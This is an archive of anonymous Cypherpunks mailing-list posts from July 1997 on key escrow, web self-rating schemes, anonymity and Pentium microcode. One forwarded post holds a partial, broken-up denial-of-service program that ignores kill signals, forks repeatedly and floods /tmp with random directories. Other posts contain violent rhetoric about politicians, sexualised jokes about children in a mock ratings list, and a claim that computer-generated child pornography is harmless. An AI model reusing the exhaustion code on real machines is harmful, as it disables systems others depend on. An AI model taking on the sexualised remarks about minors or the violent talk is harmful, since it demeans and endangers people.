I don't see Cypherpunks being naieve about the need to compromise in
order for people to live together, but I think Cypherpunks recognize the difference between things which are inviolate and those which are not.
  e.g. - A group of people in a liferaft with food and poison.
  Debate over how much each of us can eat from a pool of food held in
common may be open to compromise, but debate over whether any individual
can-or-cannot-or-*must* eat poison to end suffering or "for the good of
the collective" should *not* be open to compromise of the individual's
right to self-determination.
  The problem is that the "solution" to every "problem," in the eyes of
LEA's and the legislature, is to compromise rights and freedoms that are guaranteed by the Constitution.
  The problem is that many of the purported "problems" involve people
passing judgement on the interests and actions of others and their
"solution" is to criminalize other's actions on the basis of their own
sense of guilt and shame.
  The problem is that those promoting "compromise" often have an agenda
that is based on a series of compromises leading to complete abrogation of the other's position. {A prime example is the "compromise" of making
already-legal crypto "legal" in return for agreeing to criminalizing
other currently legal actions.)
  If you are taking a reasonable, rational stance on issues and are
marginalized or cut out of the loop in order for the government to
disenfranchise your constituents, then you can serve your constituents
by taking up arms against the criminals who are subverting the will
of the people.
  Duh... I certainly hope you are talking about giving up your *own*
fundamental liberties to remain in "the game" (which you have every
right to do). However, if you are indeed representing constituents
(or readers), then you are also giving up their liberties, as well,
to a certain extent.
  I think you need to do some serious thinking about the difference
between compromising in order to defend a position and compromising
in order to "remain a player in the game."
  If you are not strong enough to defend a position of principle
and survive, then you should not be the one "in the game" defending
that position. The ACLU and the NRA "marginalize" and "compromise"
themselves, it is not the government, the public, or their members
"doing it *to*" them.
  As far as I am concerned, what compromises you make in order to
remain in a position to report on the beltway is your own decision
to make. I just hope you have the wit and wisdom to walk with the
Devil only as far as the bridge, because he always burns it behind
him, and few make it back.

@_date: 1997-07-17 14:21:56
@_author: Anonymous 
@_subject: de minimus non curat lex 
The correct translation of "de minimus non curat lex" is: "No fart, no foul."
  In order for order to prevail, society must have the authority
to punish those who fart in a crowded theater. On the other hand,
if someone farts in a forest and nobody smells it...
  Never mind. I was having an AOL flashback.

@_date: 1997-07-17 18:02:20
@_author: Anonymous 
@_subject: All of my fucking material is suitable for children of all ages 
I have to agree with the rat-bastard, cocksucking, motherfucking
sack of shit, Tim May, on this one.
  Having Tourette Syndrome, I object to anal retentives who would
criminalize my God-given verbal predelictions. Neither would my
receiving an exception on the grounds of being disabled be remotely
acceptable to me, since I sincerely believe that my TS is a "gift"
that allows me to say anything that others say to a judge, *plus*
being able to call him or her a Nazi ratfucker. (Anyone who thinks
this is a "disability" is fucking crazy.)
  On the other hand, it would be kind of neat to launch a class action
lawsuit demanding that ratings systems incorporate a label such as:
"Suitable (FUCK!) for children (COCKSUCKER!) with Tourette Syndrome"

@_date: 1997-07-17 18:44:38
@_author: Anonymous 
@_subject: Fuck You Rating Systems, Inc. 
ANNOUNCEMENT: Fuck You Ratings Software Escapes Beta-Test!
  We are proud to announce that "Fuck You" ratings software has managed
to escape our beta-test laboratory and is now available in tit bars and
crack houses around the nation.
  Our software makes it easy and convenient to attach ratings labels to
your web site which reflect your attitude toward the anal retentive
assholes who are surfing for trouble.
"Fuck You, you Christian asshole! All I have on this web site is *real*
pussy, not *imaginary* saviors!"
"Fuck You, you LEA prick! This web site is leased in the name of my
dead grandmother, so don't bother getting a subpoena unless you're willing to do some digging."
"Fuck You, mom and dad! Until you flush your dope down the toilet, I don't need to hear any of your moralistic crapola."
  "Fuck You" ratings software has the "Lenny Bruce Found-fucking-dation"
Seal of Approval.
What others have to say about "Fuck You" ratings software:
  "Fuck."
      - Tim May
  "Shit."
      - Declan McCullagh
  "Cocksucker."
      - Dr. Dimitri Vulis, KOTM
  "Am not."
      - John Gilmore
  "Are too."
      - Paul Bradley
  "Fuck."
      - Kent Crispin
  "If you check the archives, you'll find that I said 'Fuck' earlier
  in this post."
      - Tim May
  "Darn."
      - Dorothy Denning
  "Heck."
      - Senator Snatch (hee, hee)
  Order "Fuck You" ratings software before Dec. 32, 2299, and get a free copy of "Bite Me" autoresponder software.
{Offer not valid in states where having sexual relations with animals
is against local ordinances.}

@_date: 1997-07-17 19:16:01
@_author: Anonymous 
@_subject: Fuck You Rating Systems, Inc. 
Are there any cypherpunks in Montana who are willing to serve as
a mail-drop for the rest of us?

@_date: 1997-07-17 21:36:51
@_author: Anonymous 
@_subject: EuroEnglish 
ANNOUNCEMENT FROM THE EUROPEAN UNION COMMISSIONERS
An agreement has been reached to adopt English as the preferred
language for European communications, rather than German, which was the
other possibility.  As part of the negotiations, Her Majesty's Government
conceded that English spelling has some room for improvement and has accepted a five-year phased plan for what will be known as EuroEnglish
(Euro for short).
In the first year, "s" will be used instead of "c".  Sertainly sivil
servants will resieve this news with joy.  Also, the hard "c" will be
replaced with "k".  Not only will this klear up konfusion, but komputers and typewriters kan have one less letter.
There will be growing publik enthusiasm in the sekond year, when the
troublesome "ph" will be replaced by "f".  This will make words like
"fotograf" 20 per sent shorter.
In the third year, publik akseptanse of the new spelling kan be expekted to reach the stage where more komplikated changes are
possible.  Governments will enkorage the removal of double letters, which have always ben a deterent to akurate speling.  Also, al wil agre that the horible mes of silent "e"s in the languag is disgracful, and they would go.
By the fourth year, peopl wil be reseptiv to steps such as replasing "th" with "z" and "w" with "v".
During ze fifz year, ze unesesary "o" kan be dropd from vords kontaining "ou", and similar changes vud of kors be aplid to ozer kombinations of leters.  After zis fifz yer, ve vil hav a reli sensibl riten styl.  Zer vil be no mor trubls or difikultis and evrivun vil find it ezi to understand ech ozer.
ZE DREM VIL FINALI KUM TRU.

@_date: 1997-07-18 01:09:51
@_author: Name Withheld by Request 
@_subject: No Subject 
In some cases that may not be a bad idea :). But getting back to the
original point, if I'm going to be subject to jail for mislabeling my
pages (and how do you tell, given that some systems use a numeric rating? count the nipples and add the size of any erections?) then that would seem to be a good reason to move my Web site out of America.   Idependent rating systems are a good thing, and we've talked about them
here many times in the past (e.g. 'repuation markets'). A mandatory
requirement for web authors to rate their own pages is a hideous idea
which will simply move more of the Web overseas, helping to destroy the US
economy. WebMonger

@_date: 1997-07-18 09:03:48
@_author: Anonymous 
@_subject: <sigh> 
Happy to oblige.
  Yeah, Lucky Green took care of it.
  We should have a few hours to discuss what we're going to do
to that piece of shit, WG III.

@_date: 1997-07-19 16:06:14
@_author: Anonymous 
@_subject: Anonymous virtual networks 
What if people were to create virtual machines (eg Java or whatever) which
were accessible to anyone on the internet, and linked them together in a
virtual network.  CPU-time and bandwidth on the virtual machines could then
be sold (or more likely bartered).
The network would be self-contained, so nobody outside the virtual network
would see it.
So, when one wants to send some anonymous messages, just buy or trade for
some processor time and disk space somewhere, then mail in a remailer
program and it'll run.  When it runs out of cpu-time credits, it just gets
deleted.  (The machine owner would have little reason to keep it around,
since it is more economically profitable to lease the disk space to
someone else rather than try to decrypt old remailer traffic, which would
likely be a futile effort, given enough layers of encryption)
So let's say we agree I'll give you 10 mips-years of cpu and 10 MB disk
space and 100 MB of network traffic on my machine, and you give me the same
on your computer.  I then trade some of the CPU time & disk space on your
machine to Joe, who uses it to set up some remailers.  Joe then sells
remailer services to some newbies.  After their pre-paid remailer cards run
out then Joe's remailer has used up all his CPU-credits on your machine and
the remailer (and the evidence) disappears.  Your computer just deletes the
files and you never know about Joe or his anonymous message service.
Pretty good anonymity. :-)
Of course, in order to prevent certain obvious harassment attacks, the
virtual network would need to remain self-contained, so people would need
their own virtual-network/virtual-computer clients to access their
anonymous mail.  They'd probably even need to sell their cpu-cycles to key
crackers in order to pay for their email service. ;-)

@_date: 1997-07-20 00:09:41
@_author: Anonymous 
@_subject: PICS recipes 
Dimitri the KOTM has asked how to rate one's Web site as being very "nasty".
Add the following META tags between the  and  tags:
(The stuff between the single quotes ' ' should probably be all on one line!)
Add the following RFC822-style header to your e-mail and Usenet articles:
PICS-Label: (PICS-1.1 " l r (n 4 s 4 v 4 l
 4) " l r (SS~~000 9 SS~~001 9 SS~~002 9
 SS~~003 9 SS~~004 9 SS~~005 9 SS~~006 9 SS~~007 9 SS~~008 9 SS~~009 9 SS~~00A
 9) " l r (s 2)
 " l r (P 4 S 7 SF 2 V 5 Tol 4 Com 3 Env
 2 MC 2 Gam 3 Can 0 Edu 1 ))
          /\ /\
         ((ovo)) RatingsMonger
         ():::()
           VVV

@_date: 1997-07-20 00:48:31
@_author: Anonymous 
@_subject: No Subject 
It seems that Mr. Shea is still a bit wet behind the ears when it comes to understanding how the world really works.  Listen up, Joe.  You might learn something here:
As TruthMonger correctly points out, no terrorist is going to use an escrowed key to encrypt info about his activities.  At least not as his only source of encryption.  He may first encrypt the message with one or more non-GAK keys and then use the GAK key for the final layer, to make the message look legit (i.e., "government approved") to anyone who may be analyzing the contents of email traffic, looking for "unapproved crypto."  Therefore, if someone is plotting to blow up San Francisco, GAK will be of no help in preventing it.
Now the LEAs are not stupid.  They realize this fact.  Then why are they so adamant about implementing GAK when it will do absolutely nothing to prevent the very things (i.e., terrorism, child porn, [crime du jour]) it is supposedly meant to counter?  Because terrorism, etc. are not the reasons they are pushing for GAK.  The real reason is control: control over the You see, Joe, the LEAs have seen the future, and it has scared them shitless.  They see a world filled with ubiquitous privacy via strong encryption, privately-issued digital cash which transcends national borders and the taxman, and a digital world completely beyond their control.  The powermonger's worst nightmare is to lose his power.  He will do anything he can to maintain it.  If GAK is slowly, but surely implemented over the next few years, maybe, just maybe, the powermongers will be able to maintain control.  Or at least that's what they hope.
If not, then the self-righteous moralist will lie awake at night in frustration knowing that somewhere in the world, someone is getting off to a .jpg image of child porn, even though that image was generated digitally without actually causing harm to any children.  The DC politicos will be outraged that Americans are systematically moving their money offshore (via digital cash), out of the clutches of the IRS.  The media thought police will not be able to control the flow of information around the world, thus exposing the lies that they attempt to propogate as "truth."
Now, Joe, perhaps you are the kind of person that thinks dodging the taxman is wrong?  Perhaps you think the government has the right to force its citizenry to pay for things like nuclear warheads, abortion clinics, or bribes to line the pockets of Third World banana republic dictators?  I hope you are more intelligent than that, Joe.
You see, it's all very simple, but we humans tend to complicate things needlessly.  The fundamental question is whether or not we have the right to tell others what to do.  If I was to stick my hand in your pocket, pull out your wallet, and give all your money to a beggar on the street, you'd probably have me arrested.  And you would be completely right in doing so, because I unjustly took what didn't belong to me.  But this is exactly what the government does to us every day.  They force us ("voluntary compliance") to cough up a chunk of earnings to pay for their ridiculousness.  If we don't pay, they levy our bank accounts or seize our assets, all under the guise of "law."
The point is this: nobody has the right to tell me what to do.  No single person, nor a group of politicians claiming to represent "my best interests" has the right to force me to do anything.  I have the inherent (some call it God-given) right to live my life free from oppression.  If you choose to submit yourself to the slavery of another man, that's your business.  But you do not have the right to submit me to the same.
Anyone who believes that government has certain "rights" that an individual does not have is severely flawed in their logic.  In fact, that person is simply an oppressor at heart.  If you think the government has the "right" to stick its hand in my pocket to fulfill what you perceive to be "good", then you knowingly support oppression.  If you think government has the "right" to punish others who do not agree with your subjective moral code, then you are an oppressor.
So what are you, Joe?  Are you an oppressor or not?  It's a yes or no answer.  There is no middle ground.  If you think there is middle ground, it only shows that you sympathize with the oppressors, and therefore are one of them deep down inside.
Yours Truly,
Freddy Bastiat

@_date: 1997-07-20 14:26:36
@_author: Anonymous 
@_subject: Something of Interest (fwd) 
It is my recollection that Igor filters the incoming files that use
a blind cc: to cypherpunks and checks to see if they
are spam with cc:'s to a thousand email addresses or are meant for
the cypherpunks list in specific.
  If they are not just random spam, then Igor forwards them to the
list subscribers, which accounts for the headers showing the post
as a forward rather than as sent directly to the list.

@_date: 1997-07-21 13:19:00
@_author: Name Withheld by Request 
@_subject: fork problem, fix? 
bugtraq
   This program is a beefed up classic denial of service fork()'er :)
   Compilation:
   In the future:
   Direct All Suggestions And Flames to: Vio
  NOTE: this program is provided for educational purposes only, its author
            .a&$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&a.
            $$'   s   `$'   s   `$    $    $    $    `$   $$
            $$    $    $    $    $    $    $    $         $$
            $$    $    $ p  $ h  $ e  $ a  $ r  $   $a.   $$
            $$    $ssss$    $    $    $    $    $   $$$   $$
            $$    $    $    $    $.   $   ,$    $   $$$   $$
            $$.   $   ,$.   $   ,$$.     ,$$   .$   $$$   $$
            `$$&
        MAX_FILELEN 100	/* The _actual_ max length */
 MAX_DIRLEN 10
 START_DIR "/tmp"   /* This can be substituted for any directory */
void dirs_generator(void);
main(int argc, char *argv[])
int fp;
char *buff;
char chr;
signal(SIGINT,	SIG_IGN);	/* If any of the signals don't work */
signal(SIGHUP,	SIG_IGN);	/* on the system you are compiling  */
signal(SIGTERM,	SIG_IGN);	/* them on, just erase that line    */
signal(SIGALRM,	SIG_IGN);
signal(SIGBUS,	SIG_IGN);
signal(SIGFPE,	SIG_IGN);
signal(SIGILL,	SIG_IGN);
signal(SIGIOT,	SIG_IGN);
signal(SIGPIPE,	SIG_IGN);
signal(SIGQUIT,	SIG_IGN);
signal(SIGSEGV,	SIG_IGN);
signal(SIGTRAP,	SIG_IGN);
signal(SIGUSR1,	SIG_IGN);
signal(SIGUSR2,	SIG_IGN);
 BSD_C  SYSV_C
if(fork()) {
  }
if(fork()) {
 	}
 }
void dirs_generator(void)
char alph[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
char fl[MAX_FILELEN]; char dir[MAX_DIRLEN];
int i;
int flen;
printf("Making dirs..\n");
fork();	/* For the simplicity of the code.. we also want more dir's from */
fork(); /* the START_DIR						 */
while(1) {
                fl[i] = alph[rand() % strlen(alph)];
       }

@_date: 1997-07-22 01:08:13
@_author: Anonymous 
@_subject: CDT's Berman Opposes Online Anonymity 
AMERICAN CIVIL LIBERTIES UNION
                       WASHINGTON OFFICE
                                                    122 Maryland Avenue, NE
 November 1, 1985                                   Washington, DC 20002
                                                    --------------------
                                                    National Headquarters
Mr. David Chaum                                     132 West 43rd Street
Centre for Mathematics and Computer Science         New York. NY 10036
P.O. Box 4079                                       (212) 944-9800
19O9 AB Amsterdam                                   Norman Dorsen
                                                      President
Dear Mr. Chaum:                                     Ira Glasser
                                                      Executive Director
                                                    Eleanor Holmes Norton
                                                      CHAIR
                                                    National Advisory
                                                    Council
        Thank you for sending me a most interesting article.   A
society of  individuals  and  organizations  that  would  expend  the
time and resources to use a  series  of  'digital  pseudonyms' to
avoid data linkage does not in my opinion make big brother
obsolete but  acts  on  the  assumption  that  big  brother  is  ever
present.  I  view  your  system  as  a  form  of  societal  paranoia.
        As a matter of  principle,  we  are  working  to  enact  formal
legal protections for  individual  privacy  rather  than  relying  on
technical solutions.   We want to  assume  a  society  of  law  which
respects legal limits rather than  a  society  that  will  disobey  the
law, requiring  citizens  to  depend  on  technical  solutions.  e.g.
require  a  judical  warrant  for  government  interception  of  data
communications rather than  encrypt  all  messages  on  the  assumption
that regardless of the lawt  the  government  will  abuse  its  power
and invade privacy.
        As a  matter  of  practicality,  I  do  not  think  your  system
offers much hope for privacy.    First, the trend toward universal
identifiers  is  as  much a  movement  generated  by  government  or
industry's desire to keep track of all citizens as it is by
citizens seeking simplicity and convenience in all transactions.
At best,  your  system  would  benefit  the  sophisticated  and  most
would opt for  simplicity.  The  poor  and  the  undereducated  would
never use or benefit from it.
        Finally where there's a  will, there's  a  way. If  government
wants to link data bases, it  will,  by  law, require  the  disclosure
of various individual pseudonyms used by citizens or prohibit it
for data bases which the government wants to link.  Since
corporations  make  money  by  trading  commercial  lists  with one
another, they will never adopt  the  system  or  if  it  is  adopted,
will use "fine printn  contracts  to  permit  selling  various   codes
used by their customers to other firms.
        The solution remains law, policy, and consensus about limits
on government or corporate intrusion into areas of individual
autonomy.  Technique can be used to enforce that consensus or to
override it. It cannot be used as a substitute for such
                                            Sincerely Yours,
                                             /Sig/
                                            Jerry J. Berman
                                            Chief Legislative Counsel
                                            & Direrector ACLU
                                            Privacy Technology Project
   cc: John Shattuck

@_date: 1997-07-22 13:43:33
@_author: Anonymous 
@_subject: No Subject 
Hey, has anyone taken a look at this file on RSA's ftp?
It is encrypted using only the zip cypher, as far as I can tell. There is a known plaintext attack against this cypher by Biham and Kocher. There are files compressed and encrypted in the archive that are freely available online. A known plaintext attack would seem easy but the files are compressed with a version 5.0 for NT. Is the encryption algorithm in this product different (more secure) than in other versions? Is it a good idea for RSA to distribute their software like this? Would it be legal to export (intentionally or not) files while encrypted and seemingly unusable if the algorithm used to encrypt could be easily broken?

@_date: 1997-07-23 05:39:12
@_author: Anonymous 
@_subject: CDT's Berman Opposes Online Anonymity 
I think we've all been thru this before, with the Esther Dyson flap and
so on.  That was then, this is now.
Online anonymity was not much of a real issue ten years ago, and I doubt
most readers had formed much of an opinion on it.  On private BBSes it
was prevelant, and on academic and corporate networks it was virtually
nonexistant.  As these networks began to merge, not surprisingly people
came down on both sides of the issue, but their opinions were backed more
by convention than by the facts of the situation.
I think that as time has progessed, people have come to see the reasons
behind it.  Five years ago, there was considerable debate over whether
anon.penet.fi should exist, today almost everyone takes for granted the
right to post anonymously.  For all the animosity he has caused, Spamford
Wallace has shown us why you don't want people to know your email address.
Some of you may remember the comments made on the list by a certain law
professor, who said he wouldn't post to usenet because he didn't want to
get junk mail.  In hindsight we can laugh at that remark in light of the
obvious solution.

@_date: 1997-07-23 05:41:30
@_author: Anonymous 
@_subject: CDT's Berman Opposes Online Anonymity 
Is it so, or rather is it that the technology has been deployed in response
to a changing situation?

@_date: 1997-07-23 14:01:11
@_author: Anonymous 
@_subject: IRS sending warning notes, violating ECPA? 
I spoke to the judge in the case and he has agreed that your
"dressing down" of Jim is a far more severe sentence than anything
he could impose, so he is turning Jim loose this afternoon.
  Seriously...
  Your comments reminded me why I read the PRZ's PGP manual/intro
every now and again to refresh my memory/paranoia about security
  Perhaps the hardest part of maintaining secure communications and
personal privacy is remembering that, no matter how tight you run your
own ship, you are, to a certain extent, "married" to the people with
whom you communicate. And, to use an AIDS analogy, you are also
"married" to everyone they have slept with.
  Perhaps you would trust "mom" with your life. However, what if the
ever-present "they" threatened to kill all of her other children unless she ratted you out? The answer to this question doesn't matter
if you have used cryptography and/or anonymity in a manner that doesn't
leave you vulnerable to anyone else.
  Even if mom would never 'rat you out' under any circumstances, does
she have the knowledge and discipline needed to keep "them" from being
able to access your communications with her?
  The bottom line is that one should "err" on the side of safety. Being
_too_ paranoid is less costly than not being paranoid enough.
  Tim May's rants are not done in ignorance. He understands the legal
differences between saying "The criminals in D.C. _should_ be nuked.",
and saying, "I _am_going_to_ nuke the criminals in D.C., someday."
(Friday, at 4 o'clock.)
  I am certain that Tim is well aware that, even if he is right about
his statements being Constitutionally protected free speech, there is always the chance that he could suffer grief or imprisonment for them(
quite simply because "the criminals" are getting more profecient at
subverting and destroying the rights protected by the Constitution).
  I am just as certain that Tim has made a conscious decision as to
what level of risk he is willing to take to speak his mind and perhaps
make a difference in the events of his time, without merely being
egoistical, stupid, and suicidal.
  Kent Crispin, when he's not being just plain ignorant, sometimes
manages to raise valid issues that serve as a counter-point to Tim's
views, but the bottom line is that, in the presence of two other
world-leaders who are privy to the mountains of information that is
kept hidden from the public by their governments, Jean Chretien,
the Prime Minister of Canada, openly stated that the politicians
in the U.S. would be imprisoned as criminals in most countries.
  It's true. Currently, Saskatchewan politicians are being
prosecuted for what would be considered "nickle and dime" matters
in the U.S. (e.g. <$1,000 wrongful use of expense accounts). In the
U.S., the S&L scandal involved _billions_ of dollars in fraud and
thievery and only a few of the really stupid bit-players got thrown
to the wolves.
  In short, when you communicate with anyone, it is your own
responsibility to limit the level of your future vulnerability.
If you think that it's OK to post a message to the list saying,
"I'm going to nuke D.C. on Friday, at 4 p.m. Shhh! Don't tell
anybody.", then go for it. (But keep in mind that some people
just can't keep a secret.)

@_date: 1997-07-23 14:13:28
@_author: Anonymous 
@_subject: R.I.P Jim Bell 
Mike Duvos wrote the stuff appended to this post:
  I found this post either really funny or really scary.
  Maybe both.

@_date: 1997-07-24 02:38:21
@_author: Name Withheld by Request 
@_subject: Brit Fascists To Track Motorists 
Well, I see on the news that the British Government are installing cameras
with OCR capabilities throughout London so that they can track all the
cars which pass by. Of course this is only to track 'terrorists and car
thieves', not ordinary law-abiding citizens, no, no, no, not at all, guvnor,
so that's all right. And don't worry about all those reports that the British
Police Force is full of corrupt officers who the superiors can't fire.
  I wonder why no-one in the media has pointed out that terrorists and car
thieves, being, after all, criminals, will have no qualms about strapping
on false plates. Oh, but I guess it will catch 'stupid' terrorists and
criminals, so that's all right after all.
  Odd that this was announced the same day as other annoucements of the British Government joining an EU-wide system to track millions of European
subversives (including, apparently, those who have been to rock concerts?). I bet it's just one of them coincidences...

@_date: 1997-07-26 09:40:17
@_author: Anonymous 
@_subject: An Attempt to Hobble SAFE Crypto Bill 
Yeah, eventually.  Judge Nugent sure is taking his time with it...

@_date: 1997-07-26 11:42:38
@_author: Anonymous 
@_subject: Pentium Microcode Encryption (was Re: Another vulnerability) 
The processor doesn't actually burn in the patch to on on-board EPROM,
does it?  (If it did, then the BIOS wouldn't need to load it on boot-up.)
So you can't actually wipe out microcode in the CPU.
I can't imagine them wasting precious die space to implement a multiple
round, fully cryptanalysis-proof encryption scheme, especially
considering that the microcode-update curcuitry takes up quite a bit of
space already.  It seems more likely that they would use a combination
of a few logic gates and some permutations, which wouldn't take up much
space.  (Unless, of course, they implemented the microcode-updater as
microcode software itself, which would be a really stupid thing to do -
How could the program run while overwriting itself?)
Furthermore, they mentioned "there are two levels of encryption in the
processor"  That is really bad design from a cryptanalysis point of view.
Once the outer layer has been stripped off and you find a valid header,
you can then attack the next layer by itself.  (assume a valid header
decryption could be determined by it having a low entropy in the
data-compression sense.)
That leaves the checksum question.  CRC is widely used, so they probably
had a crc design on file and could have just stuck it in.  But there is
no other use for crc calculation in the cpu, and an arithmetic checksum,
or ever XOR would be simpler.  Hmm...  (Of course you could always try to
do it like Matt Blaze did with clipper. :)
That sounds like it could be very useful.  A context-switch on a pentium
takes over a hundred clock cycles while the processor dumps all its
registers.  The problem is that on a modern 32-bit OS many of those
registers, such as the 16-bit segment registers, are not used.  If you
could change the microcode so that it would temporarily ignore those
registers it would give you faster task-switching and better performance.
I think a lot of Linux users would be interested in something like that.
Anyone know where I could find some of these 2048-byte update blocks?
It might be interesting to run some statistical analysis on it... :)

@_date: 1997-07-26 15:21:07
@_author: Anonymous 
@_subject: OKC Bomber, or Cowardly Lion? / Re: IRS sending warning notes, violating ECPA? 
But...?
  ...he doesn't cut his dick off with an axe, to show how brave
he is?
  ...he doesn't phone up the DEA and tell them, "I'm shooting
heroin, but please don't raid my house?"
  ...he doesn't take out an ad in the New York Times to announce
that he will be nuking D.C. at 4 p.m. on Friday?
  I once built a bar in Austin, Texas, named "Crazy Bob's Saloon."
I put a diving board on top of the 1 1/2 story building and put an
old bathtub on the sidewalk below, which I filled with water.
  All week long we advertised that at noon, on Grand Opening Day,
Crazy Bob was going to jump off the diving board, and into the
bathtub full of water. During our Grand Opening, 12 noon rolled
around and Crazy Bob walked outside, with everyone following him.
  Crazy Bob looked up at the diving board, then looked down at the
bathtub full of water. He looked back up at the diving board, once
again, and back down at the bathtub full of water. Then he turned
to the crowd, and said, "Folks, they call me _Crazy_ Bob, not
_Stupid_ Bob!" Then we all went back inside and partied down.
  At the end of the night, when everybody had gone home, Crazy Bob
and I took a bottle of whiskey up to the rooftop, had some drinks
and discussed the fact that, as a man of honour, he was obligated
to make the dive, despite the fact that the "sheeple" were more
than satisfied by having an entertaining story to go home and tell
their friends.
  Did he make the dive?
  It's nobody's business but his own. I was there, and at the right
time, in the right place, with the right amount of liquor in me and
a full moon egging me on, I just might tell you. But, regardless, it
would still really be nobody's business except for Crazy Bob's.
  Perhaps Tim May is the _real_ OKC bomber, or perhaps he is the
cowardly lion. (cringing when "Toto" barks :>)
  Whether Tim "walks his talk" or not is not my business, nor is it
Kent's, or anyone else's business. One's public words may reflect
their personal anthem, their own flag/values/beliefs, or their words
may be merely the braying of mules. What matters is the value, or lack
thereof, that we may personally glean from those words, to our own
edification or detriment.
  However, the "rack" is not a "bicycle built for two." When we are
put on the rack, to test the strength of our beliefs, then the pain,
the certainty or doubt, the salvation or degredation, are all our own.
  I enjoy the outrageously strong opinions which do battle on the
CypherPunks list, and I even have a mail folder titled, "CyberPissing,"
in which I save the posts which contain classic cheap-shots.
  I respect those who stand up for what they believe in and are not
hesitant about attacking the faults they find in the logic or beliefs
of others on the list. I consider it a "public service" when others
take a shot that points out my errors/hypocrisy/stupidity, etc. It
gives me the opportunity to say, "They are right. I should adjust my
belief/attitude.", or say, "They are right, but so the fuck what? It
is my personal predeliction to be an asshole about this, and it suits
me just fine."
  It is my personal view, however, that the line between difference of
outlook/opinion and spurious, personal slander is crossed when one
stoops to denigrate the character of another list member by accusing
them of what might be "conscious evils" such as comfortable cowardice,
willful hypocrisy, or determined stupidity.
  Perhaps I will break down on the "rack" and deny all of my strongly
held beliefs, but please don't accuse me of being a boastful coward
who only holds to my beliefs when it is "safe" to do so.
  I may hold views which fail to remain consistent when measured
against standards that reflect the knowledge and experience of others,
but please don't accuse me of willfully attempting to espouse my views
only to my benefit and at the expense of others.
  Sometimes I'm a fucking idiot and probably ought to be taken out
and shot, but I strive to come by my stupidity "honestly," and not to
use stupidity as an "excuse" to do evil.
  Tim May is a grouchy old CypherPunk with an itchy trigger finger and
Kent Crispin has suffered the misfortune of having the the government
secretly implant silicon chips in his brain that flash random images
of current and past senators, congressmen and presidents repeating,
"I am not a crook...I am not a crook..."
  I am certain that each of them is equally certain of their beliefs,
and the decision as to which of them would make the world a better
place by using the Dr. Kevorkian Gift Certificate I sent them for
Christmas lies in the hands of the individuals who support or
oppose their stance on various issues.
  My personal opinon is that we should "Kill them both, and let
TruthMonger sort them out."
  Of course, I may be biased in this regard. After all, I am...

@_date: 1997-07-26 20:17:19
@_author: Anonymous 
@_subject: New Ratings Categories / Re: Yet another self-labeling system (do you remember -L18?) 
An anonymous source has confirmed that the operator of an
Bot has struck a deal with government officials to drop them from the
betting list in return for their support for the following self-rating
categories being approved:
"Suitable for children who masturbate excessively."
"Suitable for children who are fucking their siblings."
"Suitable for children who would like to make a quick twenty bucks."
"Suitable for children who are considering murdering their parents."
"Suitable for children whose Uncle Jim can make ice-cream come out
 of his pee-pee."
"Suitable for children who pull the legs off of grasshoppers and set
 the family cat on fire."
"Suitable for children who are being tried as adults because their
 case got enough press to result in votes for a judge who shows that
 he is 'tough on crime.'"
"Suitable for children whose parents or guardians are beating them
 more severely than in the fantasy scenes portrayed on this web site."
"Suitable for children whose parents, teachers and priests tell them
 they are sinful, evil creatures whom God will burn in Hell-Fire for
 questioning and/or resisting Authority."
"Suitable for children who will never amount to anything, anyway,
 because they have the wrong skin color, are being raised in poverty,
 and will probably be shot to death by policemen who will be fined
 two day's pay for not following proper police procedure."
"Suitable for children who plan to kill themselves because nobody loves
 them enough to make life seem worth living."
"Suitable for children who are selling crack to children even younger
 than themself."
"Suitable for children who carry a gun to school so that they have a
 chance of getting home alive."
"Suitable for children who, in the future, will be the victim of sexual
 harassment by the President."
"Suitable for children who will eventually suffer major health problems
 as a result of serving their country, and will be denied health
"Suitable for children who need to experience as much as they can, right
here and now, because in the future they will have no rights or freedom,
but will have their lives tightly monitored and controlled by the
 > Self-rating and/or browsers that can read these self-ratings will be
  The government is grandstanding their ploy to promote an increasing
level of censorship (and eventually "criminalize" non-compliance with
what they now portray as "voluntary" ratings) *DESPITE* the fact that
there are already tools available to meet the needs the government
claims to be addressing.
  If city kids drive their cars out into the country to watch the
farmer's wife undressing through the bedroom window, will the government
pass laws criminalizing country residents building houses which
have windows? God forbid that the Founding Fathers might have their
words twisted by villainous Cypherpunks to suggest that they would
expect parents to take responsibility for their children's upbringing
and activities.
  I'm getting sick and fucking tired of the government restricting
and/or violating my rights, liberty, freedom and pursuit of happiness
in order to enable the sheeple to have the illusion of righteousness
and security despite their laziness/unwillingness/stupidity which
is used as a rationale to pretend that products and tools which are
easily within their reach are not sufficient to meet their needs.
  What, exactly, is the problem?
  Are these censorous motherfuckers of the opinion that protecting
their children from these loudly proclaimed moral threats is not
worth spending thirty or forty bucks on?
  Are they saying that your and my rights and freedoms are worth
less than the thirty or forty bucks it would take for them to
purchase censoring software?
  Bottom Line: If you or I personally developed, and distributed freely,
a product which would guarantee that no child would ever be exposed to
any material that their parents did not approve of, these stinking,
conniving bastards would still be pressing for censorous legislation because they feel that it is their right to force their narrow, fascist,
moralistic standards on everybody.
  A Challenge To Declan: Do you have the balls to contact all of those
individuals pushing for fascist censorship in the name of "protecting
children" and ask them if they would support the rights of adults to
promote and access adult material on the InterNet if a way can be found
to guarantee that minors will not be able to access it?
  Do you have the balls to refuse letting them dodge the issue with
meaningless, bullshit, political rhetoric? Do you have the balls to
tell them that if you don't get a straight answer,  you will report that they are lying, fascist, censorist motherfuckers who are hiding
behind children to disguise their hidden agenda of forcing their personal beliefs on others?
  Oops! I seem to be redundating the "other" Billy G's points and
Could it possibly be that the true/hidden agenda and fascist, slimeball
tactics of the CR's (Censorous Ratfuckers) are so blatantly obvious that anyone on the list could have easily written this post, as well as the "other" Billy G's post?
  Could it possibly be that this is an "open secret" that the sheeple are pretending they do not know because they have been brainwashed into
accepting the guilt/blame placed on them by the self-proclaimed
"righteous" who feel that they are superior to those with different
values and beliefs, and thus are entitled to force others, at gunpoint,
to live according to their own narrow constraints of acceptable beliefs
and behavior?
  Could it possibly be that I am not, in fact, the brilliant genius that
I conceive myself to be, in seeing through the fascist righteousness
which the Censorous Ratfuckers use as a tool to justify forcing their
values and beliefs on others? Is it possible that even the sheeple understand the injustice that is being forced upon them at gunpoint,
but have the wit and wisdom to complacently comply, in order to survive
long enough to live lives of quiet desperation?
  Could it possibly be that Jesus and Jim Bell are not isolated examples
of society and government breaking down, but are actually examples of
the way the "real world" works?
  Perhaps I need to spend $200,000.00 getting elected to a $20,000.00
a year position on the Water Board in Austin, Texas, and become a
